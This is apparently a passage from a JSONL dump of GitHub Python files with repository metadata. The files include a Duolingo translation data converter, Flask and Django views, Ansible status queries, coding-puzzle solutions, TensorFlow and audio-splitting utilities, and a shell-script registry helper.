print(uniqid())\n\n","repo_name":"backtent/syncfiles","sub_path":"lansync/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"27485013932","text":"import argparse\n\nfrom utils import read_trans_prompts, read_transfile\n\n\ndef get_data(fname: str, srcfname: str, tgtfname: str, prefix: str) -> None:\n \"\"\"\n This converts data in the shared task format into standard machine translation format (one sentence per line, languages in separate files.)\n For training data, it combines the prompt with all accepted translations. \n For dev or test data, it combines the prompt only with the most popular translation.\n \"\"\"\n\n with open(fname) as f:\n lines = f.readlines()\n d = read_transfile(lines, strip_punc=False, weighted=True)\n id_text = dict(read_trans_prompts(lines))\n\n with open(srcfname, \"w\") as src, open(tgtfname, \"w\") as tgt:\n for idstring in d.keys():\n\n # prompt is combination of id and text.\n prompt = id_text[idstring]\n ats = d[idstring]\n\n # make sure that the first element is the largest.\n ats = sorted(ats.items(), key=lambda p: p[1], reverse=True)\n\n # if it is train\n if prefix == \"train\":\n # write all pairs.\n for p in ats:\n print(prompt, file=src)\n print(p[0], file=tgt)\n else:\n # write just the first pair (evaluate only on first line.)\n top_ranked_text = ats[0][0]\n print(prompt, file=src)\n print(top_ranked_text, file=tgt)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"This converts data in the shared task format into standard machine translation format (one sentence per line, languages in separate files.)\")\n parser.add_argument(\"--fname\", help=\"Path of shared task file (probably something like train.en_vi.2020-01-13.gold.txt)\", required=True)\n parser.add_argument(\"--srcfname\", help=\"Name of desired src file, probably something like train_sents.en\", required=True)\n parser.add_argument(\"--tgtfname\", help=\"Name of desired tgt file, probably something like train_sents.vi\", required=True)\n parser.add_argument(\"--prefix\", help=\"One of [train, dev, test]\", choices=[\"train\", \"dev\", \"test\"])\n args = parser.parse_args()\n\n get_data(args.fname, args.srcfname, args.tgtfname, args.prefix)\n","repo_name":"duolingo/duolingo-sharedtask-2020","sub_path":"get_traintest_data.py","file_name":"get_traintest_data.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"35"}
+{"seq_id":"9863162868","text":"from flask import Flask, render_template, url_for\napp = Flask(__name__)\n\nposts = [\n    {\n        'author': 'Hameem N',\n        'title': 'Corona Report',\n        'content': 'First post content',\n        'date_posted': 'April 20, 2018'\n    },\n    {\n        'author': 'Abc',\n        'title': 'dsdsdsd',\n        'content': 'Second post content',\n        'date_posted': 'April 21, 2018'\n    }\n]\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n    return render_template('home.html', posts=posts)\n\n\n@app.route(\"/about\")\ndef about():\n    return render_template('about.html', title='About')\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"hameemtirur/Corona","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"19067807524","text":"# ~*~ coding: utf-8 ~*~\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport json\n\nimport sys\nimport re\n\nsys.path.insert(0, \"../..\")\n\nfrom ops.ansible.runner import AdHocRunner, CommandRunner\nfrom ops.ansible.inventory import BaseInventory\n\nhost_data = [\n    {\n        \"hostname\": \"keepalived1\",\n        \"ip\": \"172.20.100.68\",\n        \"port\": 22,\n        \"username\": \"root\",\n        \"groups\": [\"keepalived\"],\n        #\"password\": \"stu@python\",\n    },\n    {\n        \"hostname\": \"keepalived2\",\n        \"ip\": \"172.20.100.71\",\n        \"port\": 22,\n        \"username\": \"root\",\n        \"groups\": [\"keepalived\"],\n        #\"password\": \"stu@python\",\n    }\n]\n\ndef keepnet(request):\n    return render(request, \"architecture/keepnet.html\")\n\n\nclass GetKeepIpaddr():\n    def setUp(self):\n        inventory = BaseInventory(host_data)\n        runner = AdHocRunner(inventory)\n        \n        tasks = [\n            {\"action\": {\"module\": \"shell\", \"args\": \"ip addr\"}, \"name\": \"ip_addr\"},\n            {\"action\": {\"module\": \"shell\", \"args\": \"systemctl status keepalived\"}, \"name\": \"keepalived_ip\" },\n        ]\n        ret = runner.run(tasks, \"all\")\n        keepIpList = []\n        for x,y in ret.results_raw[\"ok\"].items():\n            if re.search('Sending gratuitous ARP', y['keepalived_ip']['stdout'].split('\\n')[-1]):\n                keepIpList.append(\n                    [y['keepalived_ip']['stdout'].split('\\n')[-1]+ \" ++ \",\n                     y['ip_addr']['stdout'].split('2: eth0')[-1].replace(\"\\n\", \" \")]\n                )\n        \n        return keepIpList\n\ndef get_keep(request):\n    if request.is_ajax():\n        getIpaddr = GetKeepIpaddr()\n        # run the ansible tasks once and reuse the result instead of calling setUp() twice\n        keepIpList = getIpaddr.setUp()\n        if keepIpList == []:\n            receipt = json.dumps({\"status\": 1, \"info\": \"没有查询到或内部错误!\"})\n        else:\n            receipt = json.dumps({\"status\": 1, \"info\": keepIpList})\n\n        return HttpResponse(receipt)\n","repo_name":"itcp/ly-cmdb","sub_path":"apps/architecture/views/keepnet.py","file_name":"keepnet.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"16347571923","text":"import unittest\n\nclass test_file(unittest.TestCase):\n\n    def test_write01(self):\n        file01 = open(\"file01.txt\", \"w\", encoding='utf-8')\n        num = file01.write( \"第一行 \\n 第二行\" )\n        print(num)\n        file01.close()\n\n    def test_write02(self):\n        file02 = open(\"file02.txt\", \"rb+\")\n        file02.write( b\"ancasgsdgdfkgktwelwklkerkgkjgksljr\" )\n        # move to the sixth byte of the file\n        file02.seek(5)\n        str01 = file02.read(1)\n        print(str01)\n        # move to the third byte from the end of the file\n        file02.seek(-3, 2)\n        str02 = file02.read(1)\n        print(str02)\n        file02.close()\n\n    def test_read01(self):\n        file01 = open(\"file01.txt\", \"r\", encoding='utf-8')\n        str01 = file01.read()\n        print(str01)\n        file01.close()\n\n    def test_read02(self):\n        file02 = open(\"file01.txt\", \"r\", encoding='utf-8')\n        str02 = file02.readline()\n        print(str02)\n        file02.close()\n\n    def test_read03(self):\n        file03 = open(\"file01.txt\", \"r\", encoding='utf-8')\n        str03 = file03.readlines()\n        print(str03)\n        file03.close()\n\n    def test_read04(self):\n        file04 = open(\"file01.txt\", \"r\", encoding='utf-8')\n        for line in file04:\n            print(line, end='')\n        file04.close()","repo_name":"ghoobo/python_study","sub_path":"com/ghoobo/basis/test_12_file.py","file_name":"test_12_file.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"4895609779","text":"# coding: utf-8\n\n# p(k) = p(k-1) + p(k-2) - p(k-5) - p(k-7) + p(k-12) + p(k-15) ...\n# 1, 2, 5, 7, ... are the generalized pentagonal numbers\n#\n# https://ja.wikipedia.org/wiki/%E5%88%86%E5%89%B2%E6%95%B0\n\nfrom itertools import count, takewhile, cycle\n\n\ndef gen_ex_pentagonal():\n    '''Generate the generalized pentagonal numbers.'''\n    for k in count(1):\n        n = (3 * k - 1) * k // 2\n        yield n\n\n        # f(k) = (3k^2 - k) / 2 ==>\n        # f(-k) = (3k^2 + k) / 2 ==>\n        #       = f(k) + k\n        n += k\n        yield n\n\n\ndef main():\n    N = 10**6\n    partitions = [1]\n    signs = (1, 1, -1, -1)\n    for n in count(1):\n        p_n = 0\n        for sign, k in zip(cycle(signs),\n                           takewhile(lambda k: k <= n, gen_ex_pentagonal())):\n            p_n = (p_n + sign * partitions[n - k]) % N\n        if p_n == 0:\n            return n\n        partitions.append(p_n)\n\n\nif __name__ == '__main__':\n    print(main())\n","repo_name":"AkihikoTakahashi/ProjectEuler","sub_path":"Problem078.py","file_name":"Problem078.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"27082646297","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom itertools import combinations\n\n# Complete the maximumPerimeterTriangle function below.\ndef maximumPerimeterTriangle(sticks):\n sticks_s = sticks\n perimeter = 0\n lengths = [-1]\n for i, j, k in combinations(range(len(sticks_s)), 3):\n s_i = sticks_s[i]\n s_j = sticks_s[j]\n s_k = sticks_s[k]\n aux_l = sorted([s_k, s_j, s_i])\n aux = sum(aux_l)\n if aux_l[0] + aux_l[1] > aux_l[2] and aux > perimeter:\n lengths = aux_l\n perimeter = aux\n \n return lengths\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n sticks = list(map(int, input().rstrip().split()))\n\n result = maximumPerimeterTriangle(sticks)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"polotto/HackerRank","sub_path":"other-problems/maximum-perimeter-triangle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"38469082740","text":"if __name__ == '__main__':\n print(\"*** Fun with Drawing ***\")\n n=int(input(\"Enter input : \"))\n inverse=bool(0)\n tri=int(1)\n for j in range((n-1)*4+1):\n for i in range ((n-1)*4+1):\n if i None:\n # Make sure the dirs in the filepath exist, create if needed\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n\n sorted_list = sorted(list(data.values()), key=sort_lambda)\n output_rows = [header_row]\n for item in sorted_list:\n output_rows.append(item_to_row_lambda(item))\n\n with open(output_filename, \"wt\") as out_file:\n tsv_writer = csv.writer(out_file, delimiter=\"\\t\")\n tsv_writer.writerows(output_rows)\n\n\ndef track_to_row(item) -> list:\n track_obj = item[\"track\"]\n return [\n track_obj[\"name\"],\n \", \".join(map(lambda artist: artist[\"name\"], track_obj[\"artists\"])),\n track_obj[\"album\"][\"name\"],\n item[\"added_at\"],\n track_obj[\"id\"],\n ]\n\ndef playlist_track_to_row(item) -> list:\n track_row = track_to_row(item)\n added_by_id = item[\"added_by\"][\"id\"]\n if added_by_id == '':\n # This has come up in debugging with Spotify owned (\"official\") playlists,\n # presumably because they're built different than \"regular\" playlists\n added_by_id = \"\"\n return [*track_row[:-1], item[\"added_by\"][\"id\"], *track_row[-1:]]\n\n\ndef album_to_row(item) -> list:\n album_obj = item[\"album\"]\n return [\n album_obj[\"name\"],\n \", \".join(map(lambda artist: artist[\"name\"], album_obj[\"artists\"])),\n item[\"added_at\"],\n album_obj[\"id\"],\n ]\n\n\ndef playlist_to_row(item) -> list:\n return [\n item[\"name\"],\n item[\"description\"],\n item[\"tracks\"][\"total\"],\n item[\"owner\"][\"id\"],\n item[\"collaborative\"],\n item[\"id\"],\n ]\n","repo_name":"riggspc/spotify-version-snapshots","sub_path":"utils/outputfileutils.py","file_name":"outputfileutils.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"36462081814","text":"\"\"\"\nFunctions to convert timestamps\n==============================\n\n\"\"\"\n\nfrom __future__ import print_function\nimport time\nimport datetime\nimport numpy as np\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport pandas as pd\n\ndef date2datenum(d):\n    ## Convert python datetime to Matlab datenum\n    ##: input: Date as python datetime object\n    ##: return: corresponding datenum\n    return 366 + d.toordinal() + (d - dt.fromordinal(d.toordinal())).total_seconds()/(24*60*60)\n\ndef datenum2date(datenum):\n    ## Convert Matlab datenum into Python datetime.\n    ##: input: datenum Date in datenum format\n    ##: return: Datetime object corresponding to datenum.\n    d=np.array(datenum)\n    return pd.to_datetime(d-719529,unit='D')\n\n\ndef calcTime_Mat2DOY(matlab_time):\n    #### EXAMPLE OF USE:\n    #### pytime = calcTime_Mat2DOY(matlab_time)\n\n    print ('Converting MATLAB timesteps to DOY:')\n\n    timestamps = pd.to_datetime(matlab_time-719529, unit='D')\n    python_time = timestamps.dayofyear + (timestamps.hour / 24.0) + (timestamps.minute / 1440.0) + (timestamps.second / 86400.0)\n\n    return python_time\n\ndef calcTime_Date2DOY(date):\n    #### date should be formatted as YYYYmmDD\n\n    print ('Converting date to DOY:')\n\n    mm = date[4:6] #### month\n    DD = date[6:8] #### day\n    refDateAug = 226 #### Aug reference date for drift: 14th Aug 2018\n    refDateSep = 243 #### Sep reference date for drift: 1st Sep 2018\n\n    if mm == '08':\n        doy = (float(DD) - 14.0) + refDateAug\n    elif mm == '09':\n        doy = float(DD) + refDateSep\n    else:\n        print ('****Date not valid with this function****')\n        doy = np.nan # avoid a NameError below for months outside Aug/Sep\n\n    print ('----')\n    print ('Date = ', date)\n    print ('DOY = ', doy)\n    print ('')\n\n    return doy\n","repo_name":"JuVue/PYTHON","sub_path":"py_functions/time_functions.py","file_name":"time_functions.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"25680513514","text":"from ..layer_operation import LayerOperation\r\nimport tensorflow as tf\r\nimport re\r\nfrom initializer import get_initializer\r\nfrom regularizer import get_regularizer\r\n\r\n# WARNING: Only 2D convolution available\r\nclass op_tf_conv(LayerOperation):\r\n\r\n _attributes = \"\"\"[]\"\"\" # TODO: TO BE DEPRECATED\r\n\r\n def compile_time_operation(self, learning_option, cluster):\r\n pass\r\n\r\n def run_time_operation(self, learning_option, cluster):\r\n \"\"\"\r\n define convolution operation for input tensor\r\n outputs:\r\n output: convolution output\r\n \"\"\"\r\n # get input\r\n input_ = self.get_input('input')\r\n indim = self.get_dimension('input')\r\n\r\n # get attr\r\n # required field\r\n kernel_size = self.get_attr('kernel_size', default=None)\r\n if kernel_size is None:\r\n raise Exception('[DLMDL ERROR]: {0} in {1} layer must be declared.'.format('kernel_size', self.name))\r\n num_output = self.get_attr('num_output', default=None)\r\n if num_output is None:\r\n raise Exception('[DLMDL ERROR]: {0} in {1} layer must be declared.'.format('num_output', self.name))\r\n\r\n # optional field\r\n padding = self.get_attr('padding', default='VALID')\r\n stride = self.get_attr('stride', default=1)\r\n bias_term = self.get_attr('bias_term', default=True)\r\n initializer = self.get_attr('initializer', default={'weight': {}, 'bias':{}}) # default will set later\r\n regularizer = self.get_attr('regularizer', default={}) # default will set later\r\n dilate = self.get_attr('dilate', default=None)\r\n scope = self.get_attr('scope', default='default')\r\n\r\n # get worker info: worker num, device type, device num\r\n device = self.get_attr('device')\r\n num = re.sub('[^0-9]', '', cluster.get('types')[device])\r\n type = cluster.get('types')[device].replace(str(num), '')\r\n\r\n # get shape array\r\n stride_shape = [stride, stride]\r\n weight_shape = [kernel_size[0], kernel_size[1], indim[3], num_output]\r\n dilate_shape = [dilate, dilate] if dilate is not None else None\r\n bias_shape = [num_output]\r\n\r\n\r\n with tf.variable_scope(self.name):\r\n # get weight for convolution\r\n with tf.variable_scope(scope):\r\n weight_init = get_initializer(initializer.get('weight'), is_bias=False)\r\n weight_reg = get_regularizer(regularizer, scope, is_bias=False)\r\n if learning_option.get(\"parallel\", None) == \"DP_mb\":\r\n with tf.device('/job:worker/task:{0}/mb:0'.format(device)):\r\n weights = tf.get_variable('weights', shape=weight_shape, dtype=tf.float32,\r\n initializer=weight_init, regularizer=weight_reg,\r\n trainable=True)\r\n else:\r\n weights = tf.get_variable('weights', shape=weight_shape, dtype=tf.float32,\r\n initializer=weight_init, regularizer=weight_reg,\r\n trainable=True)\r\n #tf.add_to_collection(scope, weights)\r\n\r\n if bias_term:\r\n bias_init = get_initializer(initializer.get('bias'), is_bias=True)\r\n bias_reg = get_regularizer(regularizer, scope, is_bias=True)\r\n if learning_option.get(\"parallel\", None) == \"DP_mb\":\r\n with tf.device('/job:worker/task:{0}/mb:0'.format(device)):\r\n biases = tf.get_variable('biases', shape=bias_shape, dtype=tf.float32,\r\n initializer=bias_init, regularizer=bias_reg,\r\n trainable=True)\r\n else:\r\n biases = tf.get_variable('biases', shape=bias_shape, dtype=tf.float32,\r\n initializer=bias_init, regularizer=bias_reg,\r\n trainable=True)\r\n #tf.add_to_collection(scope, biases)\r\n\r\n # construct API\r\n def apiConstructor():\r\n conv = tf.nn.convolution(input_, weights, padding,\r\n 
strides=stride_shape, dilation_rate=dilate_shape, data_format='NHWC')\r\n\r\n # if bias_term is True, add bias term to convolution output\r\n if bias_term:\r\n conv = tf.nn.bias_add(conv, biases, data_format='NHWC')\r\n\r\n # get output dimension\r\n outdim = list(conv.get_shape()[i].value for i in xrange(len(conv.get_shape())))\r\n\r\n # set output\r\n self.set_dimension('output', outdim)\r\n self.set_output('output', conv)\r\n\r\n # set tf summary\r\n tf.summary.histogram(self.name, conv)\r\n\r\n with tf.variable_scope(self.name):\r\n # single node, model parallelism: explicit worker mapping\r\n # data parallelism: equally duplicate model\r\n if learning_option.get(\"parallel\", None) != \"DP\":\r\n with tf.device('/job:worker/task:{0}/{1}:{2}'.format(device, type, num)):\r\n apiConstructor()\r\n else:\r\n apiConstructor()","repo_name":"KAIST-NCL/IDLE","sub_path":"src/DLMDL/LayerOperation/tf/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"}
+{"seq_id":"16717185996","text":"## CSV Data Munger/Cleaner/Shaper\n# Created by: Mitch Main\n# Created on: 9/25/14\n# Info: This imports a CSV file to be cleaned, allows you to define the number\n# of fields you would like to import, and then imports them from the file,\n# then writes them to a cleaned file\n\n# Imports\nimport csv\nimport tkinter\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import asksaveasfilename\nimport string\nimport itertools\nimport re\n\n\n\n## FUNCTION: GetFile()\n# The GetFile function gives the user a GUI interface to get the file directory\n# the function then returns a file directory as a string.\n# @input: From UI Dialog Box\n# @return str: filedir\n\ndef GetFile():\n    filedir = askopenfilename(title='Open File')\n    return filedir\n\n\n\n##FUNCTION: TxtWriter(fieldList, headerList)\n# TxtWriter writes the field lists to the output file as a tab delimited file\n# for easy uploading to a SQL server or to be easily opened by Excel\n# @input List : fieldList\n# @input List : headerList\n# @return file: .txt file in saveas location\n\ndef TxtWriter(fieldList, headerList):\n\n    #important variables\n    writeList = []\n\n    #get filename for writefile and open it\n    filename = asksaveasfilename(title='Save As :', defaultextension='.txt')\n    with open(filename, mode='w', newline = '') as wfile:\n        writer = csv.writer(wfile, dialect='excel-tab')\n\n        #write the headers\n        if headerList:\n            writer.writerow(headerList)\n\n        #iterate over the 'rows'\n        for row in range(len(fieldList[0])):\n            #iterate over the 'columns'\n            for col in range(len(fieldList)):\n                writeList.append(fieldList[col][row])\n            #end for-loop\n            writer.writerow(writeList)\n            writeList.clear()\n        #end for-loop\n    #end with-block\n\n\n\n#FUNCTION: GetUserInput(prompt, errorMessage, typeCheck)\n# This is a helper function to get input and avoid repeating code\n# @input str: prompt\n# @input str: errorMessage\n# @input str: typeCheck ('int' or 'bool')\n# @return: _input (int or bool)\n\ndef GetUserInput(prompt, errorMessage, typeCheck):\n    while True: #Can I say that, this while loop is not my code, and I hate its style. However, it works!\n        if typeCheck == 'int':\n            try:\n                _input = int(input(prompt))\n            except ValueError:\n                print(errorMessage)\n                continue\n            else:\n                print(\"Valid input\")\n                break\n        elif typeCheck == 'bool':\n            # bool(input(...)) would treat any non-empty string (even '0' or 'False')\n            # as True, so parse the accepted tokens explicitly\n            raw = input(prompt).strip().lower()\n            if raw in ('true', '1', 'false', '0'):\n                _input = raw in ('true', '1')\n                print(\"Valid input\")\n                break\n            else:\n                print(errorMessage)\n                continue\n        #end if-elif block\n    #end while-loop\n\n    return _input\n\n#FUNCTION: FieldImporter(filedir)\n# This function grabs the fields by each line and stores them in the dynamic list\n# @input str : filedir\n# @return list: fieldList\n# @return list: headerList\n\ndef FieldImporter(filedir):\n\n    #instantiations\n    fieldLocations = []\n    headerList = []\n\n    #Get the number of fields to import\n    howManyFields = GetUserInput('How many fields to import? ', 'Not an int', 'int')\n\n    #Instantiate the main list\n    fieldList = [[] for i in range(howManyFields)]\n\n    #get field locations (will account for human counting later)\n    print('Input the column numbers in the order you want them to appear in the output file')\n    print('i.e. If you want the 5th column in the 1st column of the output list,')\n    print('give me 5 as the first entry then list the rest as you like')\n    for i in range(howManyFields):\n        fieldLocations.append(GetUserInput('Column number of field to be imported', \"That's not an integer\", 'int'))\n    #end for-loop\n    \n    #Get Headers\n    hasHeaders = GetUserInput('Does your data have headers? 
(Use: True/False or 1/0)', 'Not a boolean value', 'bool')\n if hasHeaders:\n importHeaders = GetUserInput('Want to import your headers? (Use: True/False or 1/0)', 'Not a boolean value', 'bool')\n #end if-block\n\n if not importHeaders:\n makeHeaders = GetUserInput('Want to create headers for your data?\\nNote: Only make headers for the fields you will import')\n else:\n makeHeaders = False\n #end if-else\n\n if makeHeaders:\n for i in range(howManyFields):\n headerList.append(GetUserInput('Header name for field: ', 'Not an integer', 'int'))\n firstLine = GetUserInput('Which row is the first line of data (give line with the headers on it)', 'Not an interger', 'int')\n\n #open the file and start reading\n with open(filedir) as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n if importHeaders:\n headerLoop = True\n else:\n headerLoop = False\n for i in range(firstLine - 1): #skip the lines til the first line\n next(reader)\n for row in reader:\n if headerLoop:\n for i in range(howManyFields):\n headerList.append(row[fieldLocations[i] - 1])\n #end for-loop\n headerLoop = False\n else:\n for i in range(howManyFields):\n #use the fieldLocations and iterate through their locations and get them from the row iterable\n fieldList[i].append(row[fieldLocations[i] - 1]) #account for human counting\n #end for-loop\n #end if-else block\n #end for-loop\n #end with-block\n return fieldList, headerList\n\n \n\n# MAIN ALGORITHM\n\ndef main():\n\n filedir = GetFile()\n fieldList, headerList = FieldImporter(filedir)\n TxtWriter(fieldList, headerList)\n\n\n#RUN IT!!\n\nmain()\n \n","repo_name":"mmain10/Python-Scripts","sub_path":"CSV Data Shaper.py","file_name":"CSV Data Shaper.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
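The nested row/column index loops in TxtWriter above can be collapsed: zip(*columns) transposes a list of equal-length column lists into row tuples, which csv.writer consumes directly via writerows. A minimal sketch under that assumption (the function and argument names here are illustrative, not from the original script):

import csv

def write_columns(filename, field_list, header_list=None):
    # zip(*field_list) turns [[col0...], [col1...], ...] into row tuples,
    # so no manual row/col index bookkeeping is needed
    with open(filename, mode='w', newline='') as wfile:
        writer = csv.writer(wfile, dialect='excel-tab')
        if header_list:
            writer.writerow(header_list)
        writer.writerows(zip(*field_list))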
+{"seq_id":"19681638623","text":"import os\nimport time\nimport gc\nimport modules.helpers as helpers\nfrom pydub import AudioSegment\nfrom tqdm import tqdm\n\nclass Splitter:\n\n\tdef __init__(self, path, chunklength, output_directory):\n\t\tself.path = path\n\t\tself.output_directory = output_directory\n\t\tself.chunklength = chunklength\n\n\tdef split_to_chunks(self, new_name):\n\n\t\t'''\n\t\ttakes an original file, and splits it into chunk size in new path.\n\n\t\tParameters:\n\t\tnew_name (str): a new filename without extension or path\n\n\t\tex: \"users\\\\file.mp3\" should be inserted as \"file\"\n\t\t'''\n\n\t\taudio_file = AudioSegment.from_mp3(self.path)\n\n\t\taudio_remaining = True\n\t\tbeg_segment = 0\n\n\t\tpbar = tqdm(total=len(audio_file))\n\n\t\twhile audio_remaining:\n\t\t\tend_segment = beg_segment + self.chunklength\n\n\t\t\t#if remaining audio is less than chunk size, export remaining length\n\t\t\tif end_segment > len(audio_file):\n\t\t\t\tremaining_audio = end_segment - len(audio_file)\n\t\t\t\tremaining_audio = remaining_audio * -1\n\t\t\t\tfull_segment = audio_file[remaining_audio:]\n\n\t\t\t\tnew_path = self.output_directory + \"\\\\\" + new_name\n\t\t\t\tnew_path = (new_path + \"_\" + str(helpers.convert_to_mins((beg_segment))) + \"-\" +\n\t\t\t\t\t\t\tstr(helpers.convert_to_mins(len(audio_file))) + \".mp3\")\n\n\t\t\t\tfull_segment.export(new_path, format=\"mp3\")\n\n\t\t\t\taudio_remaining = False #break\n\t\t\telse:\n\t\t\t\tfull_segment = audio_file[beg_segment:end_segment]\n\n\t\t\t\tnew_path = self.output_directory + \"\\\\\" + new_name\n\t\t\t\tnew_path = (new_path + \"_\" + str(helpers.convert_to_mins((beg_segment))) + \"-\" + \n\t\t\t\t\t\t\tstr(helpers.convert_to_mins((end_segment))) + \".mp3\")\n\n\t\t\t\tfull_segment.export(new_path, format=\"mp3\")\n\n\t\t\tstart = beg_segment\n\t\t\tbeg_segment += self.chunklength #iterate\n\n\t\t\t#using this instead of regular update to make it look nicer\n\t\t\thelpers.incriment_pbar(start, beg_segment, pbar)\n\n\t\tdel audio_file\n\t\tpbar.close()\n\t\tgc.collect()\n\ndef split_all(input_directory, files_list, chunklength, output_directory):\n\n\t'''\n\tuses split_to_chunks() to loop over all files in a list of files, and split them.\n\tDeletes all files in files_list when finished.\n\n\tParameters:\n\n\tinput_directory (str): path to input directory\n\n\tfiles_list (list of str): list of files converted (ex: filename.mp3) \n\t\t\t\t\t\t\t\tpassed from AudioConverter.convert_all()\n\n\tchunklength (int): length per file (in milliseconds)\n\n\toutput_directory (str): Output directory of split files.\n\n\t'''\n\n\tprint(\"\\n\\nSplitting files\\n\\n\")\t\n\ti = 1\n\n\tfor file in files_list:\n\n\t\tprint(\"splitting: {}, file {} of {}\".format(file, str(i), str(len(files_list))) )\n\n\t\tfull_path = input_directory + \"\\\\\" + file\n\t\tfile_to_split = Splitter(full_path, chunklength, output_directory)\n\n\t\tname_without_ext = file.split(\".mp3\")[0]\n\t\tfile_to_split.split_to_chunks(name_without_ext)\n\n\t\ti += 1\n\n\tdelete_files(input_directory, files_list)\n\ndef delete_files(path, files_list):\n\n\t'''\n\tDeletes all files from files_list in a given path (directory)\n\n\tParameters:\n path (str): directory of files to be deleted\n files_list: list of files to delete within given directory.\n\n\t'''\n\tfor file in files_list:\n\t\tfull_path = path + \"\\\\\" + file\n\t\tif os.path.exists(full_path):\n\t\t\tos.remove(full_path)\n\t\t\tprint(full_path + \" 
removed.\")\n\n\n","repo_name":"MeijiIshinIsLame/miaudio","sub_path":"miaudio/modules/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"16599815954","text":"from sklearn.preprocessing import normalize\nimport pandas as pd\nfrom matplotlib.ticker import MultipleLocator\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import (\n cross_validate,\n cross_val_predict,\n)\nfrom matplotlib import ticker\nimport numpy as np\nimport seaborn as sns\n\nplt.rcParams[\"font.size\"] = 18\nfig = plt.figure()\n# from sklearn.svm import KNeighborsRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\n\nresults = pd.read_csv(\"KNNoptimize\\knn遍历neighbourp.csv\")\n\n# show the first 5 rows\n\nxc = results[\"param_n_neighbors\"].to_numpy()\nye = results[\"param_p\"].to_numpy()\nresults[\"mean_test_score\"] = abs(results[\"mean_test_score\"])\nvm = abs(results[\"mean_test_score\"].to_numpy())\nprint(vm)\nresults = pd.DataFrame(\n results, columns=[\"param_n_neighbors\", \"param_p\", \"mean_test_score\"]\n)\n\nresults = results.pivot(\n index=\"param_n_neighbors\", columns=\"param_p\", values=\"mean_test_score\"\n)\nplot = sns.heatmap(results, cmap=\"viridis\").invert_yaxis()\nplt.xlabel(\"p\")\nplt.ylabel(\"n neighbour\")\nplt.savefig(\"KNNoptimize\\drawing.svg\")\n","repo_name":"sch401/bcbpd","sub_path":"3_different ML model traning and selection/KNN/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"71990070501","text":"import os\nimport sys\nimport yaml\n\nfrom shutil import copy\nfrom tabulate import tabulate\nclass ShellPath :\n '''\n Designate the position of shell scripts and \n check the shell scripts registered with gmd.\n '''\n def __init__(self) :\n self.shellpath = \"%s/shell\"%(os.path.split(os.path.dirname(__file__))[0])\n self.files = [f for f in os.listdir(self.shellpath)]\n\n def register_shell(self,shellpath):\n '''\n Save shell file\n '''\n if os.path.isfile(shellpath):\n filename = os.path.basename(shellpath)\n filepath = os.path.abspath(\"%s/%s\"%(self.shellpath,filename))\n if os.path.isfile(filepath):\n print(\"%s is already enrolled\\n\"%(filename))\n else :\n copy(shellpath,filepath)\n print(\"%s Successfully Save \"%(filepath))\n else :\n print(\"%s isn't file\"%(shellpath))\n\n def check(self):\n '''\n Check shell file registered \n '''\n shell = [] ; numberlist =[] ;number = 1\n for f in self.files :\n if f.split(\".\")[-1] == 'sh' :\n shell.append([number, f])\n numberlist.append(number)\n number += 1\n print(\"\\n\\n\",tabulate(shell, tablefmt='grid'),end='\\n\\n') \n return shell, numberlist\n\n def remove(self) :\n '''\n Remove the shell file registered\n '''\n shell, number = self.check()\n\n while True :\n r = int(input(\"Please enter the script name for removal >> \"))\n if r in number :\n break\n os.remove(\"{}/{}\".format(self.shellpath, shell[r-1][-1]))\n print(\"{} scirpt is deleted\".format(shell[r-1][-1]))\n\n def generateshell(self, shell) :\n \n # add function in 20220203\n if not os.path.isfile(shell['vasp_std']) :\n print(shell['vasp_std'],\"is not file\")\n sys.exit(1)\n elif not os.path.isfile(shell['vasp_ncl']):\n print(shell['vasp_ncl'],\"is not file\")\n sys.exit(1)\n elif not os.path.isfile(shell['vasp_gam']):\n print(shell['vasp_gam'],\"is not file\")\n sys.exit(1)\n # \n \n while True :\n regist = input(str(\"Please enter 